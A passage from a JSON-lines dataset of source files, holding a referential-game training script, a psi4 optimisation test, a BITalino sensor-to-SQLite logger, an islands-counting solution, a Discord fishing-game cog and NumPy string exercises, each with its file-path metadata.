f\"/{args.optimizer_type}/\"\n\n if 'reinforce' in args.graphtype:\n save_path += f'/REINFORCE_EntropyCoeffNeg1m3/UnnormalizedDetLearningSignalHavrylovLoss/NegPG/'\n\n if 'obverter' in args.graphtype:\n save_path += f\"Obverter{args.obverter_threshold_to_stop_message_generation}-{args.obverter_nbr_games_per_round}GPR/DEBUG/\"\n else:\n save_path += f\"STGS-{args.agent_type}-{args.rnn_type}-CNN-Agent/\"\n\n save_path += f\"Periodic{args.metric_epoch_period}TS+DISComp-{'fast-' if args.metric_fast else ''}/\"#TestArchTanh/\"\n \n save_path += f'DatasetRepTrain{args.nbr_train_dataset_repetition}Test{args.nbr_test_dataset_repetition}'\n \n rg_config['save_path'] = save_path\n \n print(save_path)\n\n from ReferentialGym.utils import statsLogger\n logger = statsLogger(path=save_path,dumpPeriod=100)\n \n # # Agents\n batch_size = 4\n nbr_distractors = 1 if \"partial\" in rg_config[\"observability\"] else agent_config[\"nbr_distractors\"][\"train\"]\n nbr_stimulus = agent_config[\"nbr_stimulus\"]\n obs_shape = [nbr_distractors+1,nbr_stimulus, rg_config[\"stimulus_depth_dim\"],rg_config[\"stimulus_resize_dim\"],rg_config[\"stimulus_resize_dim\"]]\n vocab_size = rg_config[\"vocab_size\"]\n max_sentence_length = rg_config[\"max_sentence_length\"]\n\n if \"obverter\" in args.graphtype:\n from ReferentialGym.agents import DifferentiableObverterAgent\n speaker = DifferentiableObverterAgent(\n kwargs=agent_config, \n obs_shape=obs_shape, \n vocab_size=vocab_size, \n max_sentence_length=max_sentence_length,\n agent_id=\"s0\",\n logger=logger,\n use_sentences_one_hot_vectors=args.use_sentences_one_hot_vectors,\n differentiable=args.differentiable\n )\n else:\n if \"Baseline\" in args.agent_type:\n if 'lstm' in args.rnn_type.lower():\n from ReferentialGym.agents import LSTMCNNSpeaker\n speaker = LSTMCNNSpeaker(\n kwargs=agent_config, \n obs_shape=obs_shape, \n vocab_size=vocab_size, \n max_sentence_length=max_sentence_length,\n agent_id=\"s0\",\n logger=logger\n )\n elif 'gru' in args.rnn_type.lower():\n from ReferentialGym.agents import GRUCNNSpeaker\n speaker = GRUCNNSpeaker(\n kwargs=agent_config, \n obs_shape=obs_shape, \n vocab_size=vocab_size, \n max_sentence_length=max_sentence_length,\n agent_id=\"s0\",\n logger=logger\n )\n else:\n raise NotImplementedError\n elif \"EoSPriored\" in args.agent_type:\n from ReferentialGym.agents import EoSPrioredLSTMCNNSpeaker\n speaker = EoSPrioredLSTMCNNSpeaker(\n kwargs=agent_config, \n obs_shape=obs_shape, \n vocab_size=vocab_size, \n max_sentence_length=max_sentence_length,\n agent_id=\"s0\",\n logger=logger\n )\n print(\"Speaker:\", speaker)\n\n listener_config = copy.deepcopy(agent_config)\n if args.shared_architecture:\n listener_config[\"cnn_encoder\"] = speaker.cnn_encoder \n listener_config[\"nbr_distractors\"] = rg_config[\"nbr_distractors\"][\"train\"]\n batch_size = 4\n nbr_distractors = listener_config[\"nbr_distractors\"]\n nbr_stimulus = listener_config[\"nbr_stimulus\"]\n obs_shape = [nbr_distractors+1,nbr_stimulus, rg_config[\"stimulus_depth_dim\"],rg_config[\"stimulus_resize_dim\"],rg_config[\"stimulus_resize_dim\"]]\n vocab_size = rg_config[\"vocab_size\"]\n max_sentence_length = rg_config[\"max_sentence_length\"]\n\n if \"obverter\" in args.graphtype:\n raise NotImplementedError\n else:\n if 'lstm' in args.rnn_type.lower():\n from ReferentialGym.agents import LSTMCNNListener\n listener = LSTMCNNListener(\n kwargs=listener_config, \n obs_shape=obs_shape, \n vocab_size=vocab_size, \n max_sentence_length=max_sentence_length,\n agent_id=\"l0\",\n logger=logger\n )\n elif 'gru' in args.rnn_type.lower():\n from ReferentialGym.agents import GRUCNNListener\n listener = GRUCNNListener(\n kwargs=listener_config, \n obs_shape=obs_shape, \n vocab_size=vocab_size, \n max_sentence_length=max_sentence_length,\n agent_id=\"l0\",\n logger=logger\n )\n else:\n raise NotImplementedError\n\n if args.symbolic:\n assert args.agent_loss_type.lower() == 'ce'\n listener.input_stream_ids[\"listener\"][\"target_output\"] = \"current_dataloader:sample:speaker_exp_latents\"\n \n print(\"Listener:\", listener)\n\n # # Dataset:\n need_dict_wrapping = {}\n\n if \"dSprites\" in args.dataset:\n root = \"./datasets/dsprites-dataset\"\n train_dataset = ReferentialGym.datasets.dSpritesDataset(root=root, train=True, transform=rg_config[\"train_transform\"], split_strategy=train_split_strategy)\n test_dataset = ReferentialGym.datasets.dSpritesDataset(root=root, train=False, transform=rg_config[\"test_transform\"], split_strategy=test_split_strategy)\n else:\n raise NotImplementedError\n \n \n ## Modules:\n modules = {}\n\n from ReferentialGym import modules as rg_modules\n\n # Population:\n population_handler_id = \"population_handler_0\"\n population_handler_config = rg_config\n population_handler_stream_ids = {\n \"current_speaker_streams_dict\":\"modules:current_speaker\",\n \"current_listener_streams_dict\":\"modules:current_listener\",\n \"epoch\":\"signals:epoch\",\n \"mode\":\"signals:mode\",\n \"global_it_datasample\":\"signals:global_it_datasample\",\n }\n\n # Current Speaker:\n current_speaker_id = \"current_speaker\"\n\n # Current Listener:\n current_listener_id = \"current_listener\"\n\n modules[population_handler_id] = rg_modules.build_PopulationHandlerModule(\n id=population_handler_id,\n prototype_speaker=speaker,\n prototype_listener=listener,\n config=population_handler_config,\n input_stream_ids=population_handler_stream_ids)\n\n modules[current_speaker_id] = rg_modules.CurrentAgentModule(id=current_speaker_id,role=\"speaker\")\n modules[current_listener_id] = rg_modules.CurrentAgentModule(id=current_listener_id,role=\"listener\")\n \n homo_id = \"homo0\"\n homo_config = {\"use_cuda\":args.use_cuda}\n if args.homoscedastic_multitasks_loss:\n modules[homo_id] = rg_modules.build_HomoscedasticMultiTasksLossModule(\n id=homo_id,\n config=homo_config,\n )\n \n ## Pipelines:\n pipelines = {}\n\n # 0) Now that all the modules are known, let us build the optimization module:\n optim_id = \"global_optim\"\n optim_config = {\n \"modules\":modules,\n \"learning_rate\":args.lr,\n \"optimizer_type\":args.optimizer_type,\n \"with_gradient_clip\":rg_config[\"with_gradient_clip\"],\n \"adam_eps\":rg_config[\"adam_eps\"],\n }\n\n optim_module = rg_modules.build_OptimizationModule(\n id=optim_id,\n config=optim_config,\n )\n modules[optim_id] = optim_module\n\n grad_recorder_id = \"grad_recorder\"\n grad_recorder_module = rg_modules.build_GradRecorderModule(id=grad_recorder_id)\n modules[grad_recorder_id] = grad_recorder_module\n\n topo_sim_metric_id = \"topo_sim_metric\"\n topo_sim_metric_module = rg_modules.build_TopographicSimilarityMetricModule(id=topo_sim_metric_id,\n config = {\n \"parallel_TS_computation_max_workers\":16,\n \"epoch_period\":args.metric_epoch_period,\n \"fast\":args.metric_fast,\n \"verbose\":False,\n \"vocab_size\":rg_config[\"vocab_size\"],\n }\n )\n modules[topo_sim_metric_id] = topo_sim_metric_module\n\n inst_coord_metric_id = \"inst_coord_metric\"\n inst_coord_metric_module = rg_modules.build_InstantaneousCoordinationMetricModule(id=inst_coord_metric_id,\n config = {\n \"epoch_period\":1,\n }\n )\n modules[inst_coord_metric_id] = inst_coord_metric_module\n \n dsprites_latent_metric_id = \"dsprites_latent_metric\"\n dsprites_latent_metric_module = rg_modules.build_dSpritesPerLatentAccuracyMetricModule(id=dsprites_latent_metric_id,\n config = {\n \"epoch_period\":1,\n }\n )\n modules[dsprites_latent_metric_id] = dsprites_latent_metric_module\n \n speaker_factor_vae_disentanglement_metric_id = \"speaker_factor_vae_disentanglement_metric\"\n speaker_factor_vae_disentanglement_metric_input_stream_ids = {\n \"model\":\"modules:current_speaker:ref:ref_agent:cnn_encoder\",\n \"representations\":\"modules:current_speaker:ref:ref_agent:features\",\n \"experiences\":\"current_dataloader:sample:speaker_experiences\", \n \"latent_representations\":\"current_dataloader:sample:speaker_exp_latents\", \n \"latent_values_representations\":\"current_dataloader:sample:speaker_exp_latents_values\",\n \"indices\":\"current_dataloader:sample:speaker_indices\", \n }\n speaker_factor_vae_disentanglement_metric_module = rg_modules.build_FactorVAEDisentanglementMetricModule(\n id=speaker_factor_vae_disentanglement_metric_id,\n input_stream_ids=speaker_factor_vae_disentanglement_metric_input_stream_ids,\n config = {\n \"epoch_period\":args.metric_epoch_period,\n \"batch_size\":64,#5,\n \"nbr_train_points\":10000,#3000,\n \"nbr_eval_points\":5000,#2000,\n \"resample\":False,\n \"threshold\":5e-2,#0.0,#1.0,\n \"random_state_seed\":args.seed,\n \"verbose\":False,\n \"active_factors_only\":True,\n }\n )\n modules[speaker_factor_vae_disentanglement_metric_id] = speaker_factor_vae_disentanglement_metric_module\n\n listener_factor_vae_disentanglement_metric_id = \"listener_factor_vae_disentanglement_metric\"\n listener_factor_vae_disentanglement_metric_input_stream_ids = {\n \"model\":\"modules:current_listener:ref:ref_agent:cnn_encoder\",\n \"representations\":\"modules:current_listener:ref:ref_agent:rnn_outputs\",\n \"experiences\":\"current_dataloader:sample:speaker_experiences\", \n \"latent_representations\":\"current_dataloader:sample:speaker_exp_latents\", \n \"latent_values_representations\":\"current_dataloader:sample:speaker_exp_latents_values\",\n \"indices\":\"current_dataloader:sample:speaker_indices\", \n }\n listener_factor_vae_disentanglement_metric_module = rg_modules.build_FactorVAEDisentanglementMetricModule(\n id=listener_factor_vae_disentanglement_metric_id,\n input_stream_ids=listener_factor_vae_disentanglement_metric_input_stream_ids,\n config = {\n \"epoch_period\":args.metric_epoch_period,\n \"batch_size\":64,#5,\n \"nbr_train_points\":10000,#3000,\n \"nbr_eval_points\":5000,#2000,\n \"resample\":False,\n \"threshold\":5e-2,#0.0,#1.0,\n \"random_state_seed\":args.seed,\n \"verbose\":False,\n \"active_factors_only\":True,\n }\n )\n modules[listener_factor_vae_disentanglement_metric_id] = listener_factor_vae_disentanglement_metric_module\n\n logger_id = \"per_epoch_logger\"\n logger_module = rg_modules.build_PerEpochLoggerModule(id=logger_id)\n modules[logger_id] = logger_module\n\n pipelines[\"referential_game\"] = [\n population_handler_id,\n current_speaker_id,\n current_listener_id\n ]\n\n pipelines[optim_id] = []\n if args.homoscedastic_multitasks_loss:\n pipelines[optim_id].append(homo_id)\n pipelines[optim_id].append(optim_id)\n \"\"\"\n # Add gradient recorder module for debugging purposes:\n pipelines[optim_id].append(grad_recorder_id)\n \"\"\"\n pipelines[optim_id].append(speaker_factor_vae_disentanglement_metric_id)\n pipelines[optim_id].append(listener_factor_vae_disentanglement_metric_id)\n pipelines[optim_id].append(topo_sim_metric_id)\n pipelines[optim_id].append(inst_coord_metric_id)\n pipelines[optim_id].append(dsprites_latent_metric_id)\n pipelines[optim_id].append(logger_id)\n\n rg_config[\"modules\"] = modules\n rg_config[\"pipelines\"] = pipelines\n\n\n dataset_args = {\n \"dataset_class\": \"DualLabeledDataset\",\n \"modes\": {\"train\": train_dataset,\n \"test\": test_dataset,\n },\n \"need_dict_wrapping\": need_dict_wrapping,\n \"nbr_stimulus\": rg_config[\"nbr_stimulus\"],\n \"distractor_sampling\": rg_config[\"distractor_sampling\"],\n \"nbr_distractors\": rg_config[\"nbr_distractors\"],\n \"observability\": rg_config[\"observability\"],\n \"object_centric\": rg_config[\"object_centric\"],\n \"descriptive\": rg_config[\"descriptive\"],\n \"descriptive_target_ratio\": rg_config[\"descriptive_target_ratio\"],\n }\n\n refgame = ReferentialGym.make(config=rg_config, dataset_args=dataset_args)\n\n # In[22]:\n\n refgame.train(nbr_epoch=nbr_epoch,\n logger=logger,\n verbose_period=1)\n\n logger.flush()\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"zoo/referential-games+disentanglement/train_discriminative.py","file_name":"train_discriminative.py","file_ext":"py","file_size_in_byte":38801,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"386279376","text":"#! SCF STO-3G geometry optimzation, with Z-matrix input\nimport psi4\nimport optking\n# These values are from a tightly converged QChem run\n\ndef test_opt1_h2o():\n refnucenergy = 8.9064890670 #TEST\n refenergy = -74.965901192 #TEST\n \n h2o = psi4.geometry(\"\"\"\n O\n H 1 1.0\n H 1 1.0 2 104.5\n \"\"\")\n\n psi4.core.clean_options()\n\n psi4_options = {\n 'diis': False,\n 'basis': 'sto-3g',\n 'e_convergence': 10,\n 'd_convergence': 10,\n 'scf_type': 'pk'\n } \n\n psi4.set_options(psi4_options)\n \n json_output = optking.optimize_psi4('hf')\n E = json_output['energies'][-1]\n nucenergy = json_output['trajectory'][-1]['properties']['nuclear_repulsion_energy']\n \n assert psi4.compare_values(refnucenergy, nucenergy, 3, \"Nuclear repulsion energy\") #TEST\n assert psi4.compare_values(refenergy, E, 6, \"Reference energy\") #TEST\n","sub_path":"tests/test_test1.py","file_name":"test_test1.py","file_ext":"py","file_size_in_byte":1066,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"234677236","text":"#!/usr/bin/env python\nimport sqlite3\nimport bitalino\nimport time\nimport numpy\nfrom scipy import signal\n\ndef highpass(data, BUTTER_ORDER=3, sampling_rate=100, cut_off=0.7):\n Wn = (float(cut_off) / (float(sampling_rate) / 2.0), 0.95)\n b, a = signal.butter(BUTTER_ORDER, Wn, 'pass')\n return signal.filtfilt(b, a, data, axis=0)\n\nprint(\"BITalino Data Collection\")\n#time.sleep(2)\n\n# Database\ndatabase = \"data.db\"\n#database = \"C:\\Users\\User\\Desktop\\Teste\\SQlite_example\"\n\n# Device MacAddress: Blt1 = 98:D3:81:FD:61:22, Blt2 = 20:15:12:22:81:68\nmacAddress = \"98:D3:81:FD:61:22\"\n\n# Acquisition Channels ([0-5])\nacqChannels = [0,1,2,3,4,5]\n\n# Sampling Frequency (Hz)\nsamplingFreq = 10\n\n# Compute Average Time (s)\ntimeCycle = 1\n\n# Acquisition Time (s) - None for Infinite\nacquisitionTime = 5\n\n\ndatabase = sqlite3.connect(database)\ncursor = database.cursor()\n\n# Restart Database\ncursor.execute(\"Drop table Configuration\")\ncursor.execute(\"Drop table Data\")\n\ntry:\n cursor.execute(\"CREATE TABLE Configuration(Id INTEGER PRIMARY KEY, MacAddress TEXT, SamplingFreq INT, InitTime TEXT, timeCycle INT, acqChannels TEXT, channelSize INT)\")\n cursor.execute(\"CREATE TABLE Data(Configuration INT, Time INT, Channel0 REAL, Channel1 REAL, Channel2 REAL, Channel3 REAL, Channel4 REAL, Channel5 REAL, FOREIGN KEY(Configuration) REFERENCES Configuration(Id))\")\nexcept Exception as e:\n pass\n\ndevice = bitalino.BITalino(macAddress)\ndevice.start(samplingFreq, acqChannels)\nprint(\"Device connected.\")\n\ncursor.execute(\"INSERT INTO Configuration(MacAddress, SamplingFreq, InitTime, timeCycle, acqChannels, channelSize) VALUES\" +\n \"('\" + macAddress + \"',\" + str(samplingFreq) + \",'\" + time.strftime(\"%c\") + \"', \" + str(timeCycle) + \",'\" + str(acqChannels) + \"',\" + str(len(acqChannels)) + \");\")\ndatabase.commit()\n\nlastIndex = cursor.lastrowid\nprint(\"Current Configuration ID: \" + str(lastIndex))\nprint(\"Collecting data.\")\n\ncurrentTime = 0\nwhile (acquisitionTime is None) or (acquisitionTime > 0):\n avg_data = [lastIndex, currentTime, None, None, None, None, None, None]\n data = device.read(samplingFreq*timeCycle)\n \"\"\"\n Values acquired per second:\n \tFrequency = 10Hz => 10 values\n \tFrequency = 100Hz => 100 values\n \t...\n \t...\n \tdata[:,5] => Channel 1 (on BITalino)\n \tdata[:,6] => Channel 2\n \tdata[:,7] => Channel 3\n \tdata[:,8] => Channel 4\n \tdata[:,9] => Channel 5\n \tdata[:,10] => Channel 5\n \"\"\"\n y_acc = data[:,5]\n #yhat = highpass(y_acc,3,1000,0.7)\n print(\"%=====================%\")\n #print(\"data[:,5]\")\n #print(y_acc)\t# acc data for channel 1\n #print(y_acc[2])\t# acc data for channel 1\n #print(yhat[2])\t# acc data for channel 1\n #print(y_acc.shape)\n print(\"%=====================%\")\n\n min_acc = min(data[:,5])\n max_acc = max(data[:,5])\n\n print(min_acc)\n print(max_acc)\n \n \"\"\"\n Apply filter to acc data here\n \"\"\"\n\n for ind in range(5, data.shape[1]):\n avg_data[acqChannels[ind - 5] + 2] = numpy.mean(numpy.fabs(data[:,ind]))\n # print(ind)\n # Aply transfer functions here;\n #avg_data[2] = ((avg_data[2] - 208)/(312 - 208))*2-1\n avg_data_conv = ((avg_data[2]-min_acc)/(max_acc-min_acc))*2-1\n print(\"Acc mean: = \", avg_data[2])\n print(\"Acc mean conv: = \", abs(avg_data_conv))\n cursor.execute(\"INSERT INTO Data(Configuration, Time, Channel0, Channel1, Channel2, Channel3, Channel4, Channel5) VALUES\" +\n \"(\" + str(avg_data).replace(\"None\", \"null\")[1:-1] + \");\")\n database.commit()\n currentTime += timeCycle\n if acquisitionTime is not None:\n acquisitionTime -= timeCycle\n\ndevice.stop()\ndevice.close()\nprint(\"Connection closed.\")\n\n# UnComment to Print Tables\n\n\"\"\"\nprint(\"\")\nprint(\"Configurations:\")\ncursor.execute(\"Select * from Configuration where Configuration \")\nfor config in cursor.fetchall():\n print(config)\nprint(\"\")\nprint(\"Data:\")\ncursor.execute(\"Select * from Data\")\nfor data in cursor.fetchall():\n print(data)\n\"\"\"\nprint(\"Program will close.\")\ntime.sleep(1)\n","sub_path":"BITalino/BITalino_SQLite.py","file_name":"BITalino_SQLite.py","file_ext":"py","file_size_in_byte":4043,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"290321403","text":"\n#dfs\nclass Solution:\n def numIslands(self, grid: List[List[str]]) -> int:\n m, n = len(grid),len(grid[0])\n count = 0\n\n for i in range(m):\n for j in range(n):\n if grid[i][j] == '1':\n count += 1\n self._dfs(grid,i,j)\n return count\n\n\n def _dfs(self, grid, r, c):\n grid[r][c]='0'\n for x,y in ((r-1, c),(r+1,c),(r,c-1),(r,c+1)):\n if 0<=x= 3:\n\t\t\t\t\tline_aux = text.replace(blocks[0], '', 1).replace(blocks[1], '', 1)\n\t\t\t\t\tself.codop = Codop(blocks[1])\n\t\t\t\t\tself.operand = Operand(line_aux[line_aux.find(blocks[2]) : ])\n\t\t\t\telse:\n\t\t\t\t\tself.codop = Codop('')\n\t\t\t\t\tself.operand = Operand('NULL')\n\n\tdef __str__(self):\n\t\tif self.comment:\n\t\t\treturn 'COMENTARIO'\n\t\telse:\n\t\t\treturn ( str(self.label) + '\\n' + str(self.codop)\n\t\t\t\t+ '\\n' + str(self.operand) )\n\n\tdef is_end(self):\n\t\treturn False if self.comment else self.codop.is_end()","sub_path":"Practica 1/Line.py","file_name":"Line.py","file_ext":"py","file_size_in_byte":1557,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"615458310","text":"import discord\nimport random\nfrom discord.ext import commands\nfrom data import database as db\nfrom helpers import utilityfunctions as util\n\nCOOLDOWN = 7200\nTRASH_ICONS = (\n \":moyai:\",\n \":stopwatch:\",\n \":wrench:\",\n \":pick:\",\n \":nut_and_bolt:\",\n \":gear:\",\n \":toilet:\",\n \":alembic:\",\n \":bathtub:\",\n \":scissors:\",\n \":boot:\",\n \":high_heel:\",\n \":saxophone:\",\n \":trumpet:\",\n \":scooter:\",\n \":anchor:\",\n \":shopping_cart:\",\n \":paperclips:\",\n \":paperclip:\",\n \":prayer_beads:\",\n \":oil:\",\n \":compression:\",\n \":keyboard:\",\n \":radio:\",\n \":tv:\",\n \":fax:\",\n \":movie_camera:\",\n \":projector:\",\n \":guitar:\",\n \":violin:\",\n)\n\n\nclass Fishy(commands.Cog):\n def __init__(self, bot):\n self.bot = bot\n self.FISHTYPES = {\n \"trash\": trash,\n \"common\": fish_common,\n \"uncommon\": fish_uncommon,\n \"rare\": fish_rare,\n \"legendary\": fish_legendary,\n }\n self.WEIGHTS = [9, 60, 20, 10, 1]\n\n @commands.command(\n aliases=[\"fish\", \"fihy\", \"fisy\", \"foshy\", \"fisyh\", \"fsihy\", \"fin\"]\n )\n async def fishy(self, ctx, user=None):\n \"\"\"Go fishing and receive or give random fish.\n\n Usage:\n >fishy\n >fishy \n \"\"\"\n receiver = await util.get_member(ctx, user, fallback=ctx.author)\n if receiver is not None and receiver is not ctx.author:\n gift = True\n else:\n gift = False\n\n fishdata = db.fishdata(ctx.author.id)\n if fishdata is not None and fishdata.timestamp is not None:\n time_since_fishy = ctx.message.created_at.timestamp() - fishdata.timestamp\n else:\n time_since_fishy = COOLDOWN\n\n TESTING = False\n if time_since_fishy < COOLDOWN and not TESTING:\n not_yet_quotes = [\n \"Bro chill, you can't fish yet! Please wait {time}\",\n \"You can't fish yet, fool! Please wait {time}\",\n \"You're fishing too fast! Please wait {time}\",\n \"You're still on cooldown buddy. Please wait {time}\",\n \"Please wait {time} to fish again!\",\n \"Sorry, but you have to wait {time} to fish again!\",\n \"Not so fast! Please wait {time}\",\n ]\n wait_time = f\"**{util.stringfromtime(COOLDOWN - time_since_fishy, 2)}**\"\n await ctx.send(random.choice(not_yet_quotes).format(time=wait_time))\n else:\n catch = random.choices(list(self.FISHTYPES.keys()), self.WEIGHTS)[0]\n amount = await self.FISHTYPES[catch](ctx, receiver, gift)\n db.add_fishy(\n receiver.id,\n catch,\n amount,\n ctx.message.created_at.timestamp(),\n fisher_id=(ctx.author.id if gift else None),\n )\n\n @commands.command(aliases=[\"fintimer\", \"fisytimer\", \"foshytimer\", \"ft\"])\n async def fishytimer(self, ctx):\n \"\"\"Check your fishy timer without actually fishing.\"\"\"\n fishdata = db.fishdata(ctx.author.id)\n if fishdata is not None and fishdata.timestamp is not None:\n time_since_fishy = ctx.message.created_at.timestamp() - fishdata.timestamp\n\n if time_since_fishy < COOLDOWN:\n wait_time = f\"**{util.stringfromtime(COOLDOWN - time_since_fishy, 2)}**\"\n await ctx.send(f\":clock4: You will need to wait **{wait_time}** to fish again.\")\n else:\n await ctx.send(\":sparkles: Good news! You can fish right now!\")\n\n else:\n await ctx.send(\"You have never fished...?\")\n\n @commands.command(aliases=[\"finstats\", \"fisystats\", \"foshystats\", \"fs\"])\n async def fishystats(self, ctx, user=None):\n \"\"\"Show fishing statistics.\n\n Usage:\n >fishystats\n >fishystats \n \"\"\"\n globaldata = user == \"global\"\n if not globaldata:\n user = await util.get_user(ctx, user, fallback=ctx.author)\n fishdata = db.fishdata(user.id)\n owner = user.name\n\n else:\n owner = \"global\"\n fishdata = None\n users = db.query(\"select user_id from fishy\")\n for user_id in users:\n user_fishdata = db.fishdata(user_id[0])\n if fishdata is None:\n fishdata = user_fishdata\n else:\n fishdata = fishdata._replace(\n fishy=fishdata.fishy + user_fishdata.fishy,\n fishy_gifted=fishdata.fishy_gifted + user_fishdata.fishy_gifted,\n trash=fishdata.trash + user_fishdata.trash,\n common=fishdata.common + user_fishdata.common,\n uncommon=fishdata.uncommon + user_fishdata.uncommon,\n rare=fishdata.rare + user_fishdata.rare,\n legendary=fishdata.legendary + user_fishdata.legendary,\n )\n\n content = discord.Embed(\n title=f\":fishing_pole_and_fish: {owner} fishy stats\",\n color=discord.Color.blue(),\n )\n if fishdata is not None:\n total = (\n fishdata.trash\n + fishdata.common\n + fishdata.uncommon\n + fishdata.rare\n + fishdata.legendary\n )\n content.description = (\n f\"Total fishy: **{fishdata.fishy}**\\n\"\n f\"Fishy gifted: **{fishdata.fishy_gifted}**\\n\"\n f\"Total fish count: **{total}**\\n\\n\"\n f\"Biggest fish: **{fishdata.biggest} Kg**\\n\"\n f\"Average fishy: **{fishdata.fishy / total:.2f}**\\n\\n\"\n f\"Trash: **{fishdata.trash}** - {(fishdata.trash / total) * 100:.1f}%\\n\"\n f\"Common: **{fishdata.common}** - {(fishdata.common / total) * 100:.1f}%\\n\"\n f\"Uncommon: **{fishdata.uncommon}** - {(fishdata.uncommon / total) * 100:.1f}%\\n\"\n f\"Rare: **{fishdata.rare}** - {(fishdata.rare / total) * 100:.1f}%\\n\"\n f\"Legendary: **{fishdata.legendary}** - {(fishdata.legendary / total) * 100:.1f}%\\n\"\n )\n\n await ctx.send(embed=content)\n\n\nasync def fish_common(ctx, user, gift):\n amount = random.randint(1, 29)\n if amount == 1:\n await ctx.send(\n f\"Caught only **{amount}** fishy \"\n + (f\"for **{user.name}**\" if gift else \"\")\n + \"! :fishing_pole_and_fish:\"\n )\n else:\n await ctx.send(\n f\"Caught **{amount}** fishies \"\n + (f\"for **{user.name}**\" if gift else \"\")\n + \"! :fishing_pole_and_fish:\"\n )\n return amount\n\n\nasync def fish_uncommon(ctx, user, gift):\n amount = random.randint(30, 99)\n await ctx.send(\n \"**Caught an uncommon fish\"\n + (f\" for {user.name}\" if gift else \"\")\n + f\"!** (**{amount}** fishies) :blowfish:\"\n )\n return amount\n\n\nasync def fish_rare(ctx, user, gift):\n amount = random.randint(100, 399)\n await ctx.send(\n \":star: **Caught a super rare fish\"\n + (f\" for {user.name}\" if gift else \"\")\n + f\"! :star: ({amount} \"\n \"fishies)** :tropical_fish:\"\n )\n return amount\n\n\nasync def fish_legendary(ctx, user, gift):\n amount = random.randint(400, 750)\n await ctx.send(\n \":star2: **Caught a *legendary* fish\"\n + (f\" for {user.name}\" if gift else \"\")\n + f\"!! :star2: ({amount} \"\n \"fishies)** :dolphin:\"\n )\n return amount\n\n\nasync def trash(ctx, user, gift):\n icon = random.choice(TRASH_ICONS)\n await ctx.send(\n f\"Caught **trash{'!' if not gift else ''}** {icon}\"\n + (f\" for {user.name}!\" if gift else \"\")\n + \" Better luck next time.\"\n )\n return 0\n\n\ndef setup(bot):\n bot.add_cog(Fishy(bot))\n","sub_path":"cogs/fishy.py","file_name":"fishy.py","file_ext":"py","file_size_in_byte":7891,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"22325170","text":"import numpy as np\nimport pandas as pd \nfrom PIL import Image \nfrom io import StringIO \n\n#Questions on NumPy Strings\n# Repeat all the elements of a NumPy array of strings\n# char.multiply Return Array of strings\nnp.char.multiply(np.array(['a', 'b', 'c', \n 'd', 'e'], dtype = np.str) , 3) \n\n# How to split the element of a given NumPy array with spaces?\n# split Returns Output Array containing of list objects.\nnp.char.split(np.array(['PHP C# Python C Java C++'], dtype=np.str) )\n\n# How to insert a space between characters of all the elements of a given NumPy array?\n# char.join Return a string which is the concatenation of the strings in the sequence seq.\nnp.char.join(\" \", ['aaa', 'bbb', 'ccc']) \n\n# Find the length of each string element in the Numpy array\narr = np.array(['New York', 'Lisbon', 'Beijing', 'Quebec']) \narr_len = [len(i) for i in arr] \n\n# Swap the case of an array of string\n# swapcase Returns lowercased array of str or \n# unicode, depending on input type.\nnp.char.swapcase(np.array(['P4Q R', '4q Rp', 'Q Rp4', 'rp4q']) )\n\n# Change the case to uppercase of elements of an array\n# upper Returns uppercased array of str or unicode, \n# depending on input type.\nnp.char.upper(np.array(['P4Q R', '4q Rp', 'Q Rp4', 'rp4q']) )\n\n# Change the case to lowercase of elements of an array\n# lower Returns Output lowercased array of str or\n# unicode, depending on input type.\nnp.char.lower(np.array(['P4Q R', '4q Rp', 'Q Rp4', 'rp4q']))\n\n# Join String by a seperator\n# core.defchararray.join Returns Output array of str or unicode with joined elements.\nnp.core.defchararray.join(['-', '*', ''], ['aaa', 'bbb', 'ccc']) \n\n# Check if two same shaped string arrayss one by one\n# core.defchararray.not_equal Returns array of bools,\n# or a single bool if arr1 and arr2 are scalars.\nnp.char.not_equal(np.array(['aaa', 'bbb', 'ccc']), np.array(['aaa', 'bb', 'ccc']))\n\n# Count the number of substrings in an array\n# count Returns the number of non-overlapping\n# occurrences of substring sub.\nnp.char.count(['aaaa', 'aba', \"bbba\"], 'a')\n\n# Find the lowest index of the substring in an array\n# find Returns array of ints.\nnp.char.find(['aaaa', 'aba', \"bbba\"], 'a')\n\n# Get the boolean array when values end with a particular character\n# endswith Return the boolean array when values ends with a value.\nnp.char.endswith(['aaab', 'aba', \"bbba\"], 'a')\n\n# More Questions on NumPy\n# Different ways to convert a Python dictionary to a NumPy array\nd = {'a': 'a', 'b': 'b', 'c': 'c'}\nnp.array(list(d.items()))\n\nnp.array([d.values()])\n\n# How to convert a list and tuple into NumPy arrays?\n# asarray Convert the input to an array.\nnp.asarray([1, 2, 3, 4, 5])\nnp.asarray((1, 2, 3, 4, 5))\n\n# Ways to convert array of strings to array of floats\n# fromstring A new 1-D array initialized from text data in a string.\nnp.array([\"1.1\", \"1.5\", \"2.7\", \"8.9\"]).astype(np.float)\nnp.fromstring('1.1, 1.5, 2.7, 8.9', dtype = np.float, sep =', ' ) \n\n# Convert a NumPy array into a csv file\ndata = np.arange(1,11).reshape(2,5) \ndf = pd.DataFrame(data) \ndf.to_csv(\"dados.csv\")\n\n# How to Convert an image to NumPy array and save it to CSV file using Python?\nimg = Image.open('test.jpg') \nimageToMatrice = np.asarray(img)\n\n# How to save a NumPy array to a text file?\nopen(\"file1.txt\", \"w+\").write(str(np.array([1, 2, 3, 4, 5]) ))\n\n# Load data from a text file\n# loadtxt Returns ndarray\n\n\n# Python program explaining \n# loadtxt() function \nimport numpy as geek \n \n# StringIO behaves like a file object \n# loadtxt Returns ndarray\nnp.loadtxt(StringIO(\"0 1 2 \\n3 4 5\") ) \n \n# Plot line graph from NumPy array\nx = np.arange(1, 11) \ny = x * x \nplt.title(\"Line graph\") \nplt.xlabel(\"X axis\") \nplt.ylabel(\"Y axis\") \nplt.plot(x, y, color =\"red\") \nplt.show()\n\n# Create Histogram using NumPy\n# histogram Compute the histogram of a set of data.\na = np.random.randint(100, size =(50)) \nnp.histogram(a, bins = [0, 10, 20, 30, 40, \n 50, 60, 70, 80, 90, \n 100]) \n \nhist, bins = np.histogram(a, bins = [0, 10, \n 20, 30, \n 40, 50, \n 60, 70, \n 80, 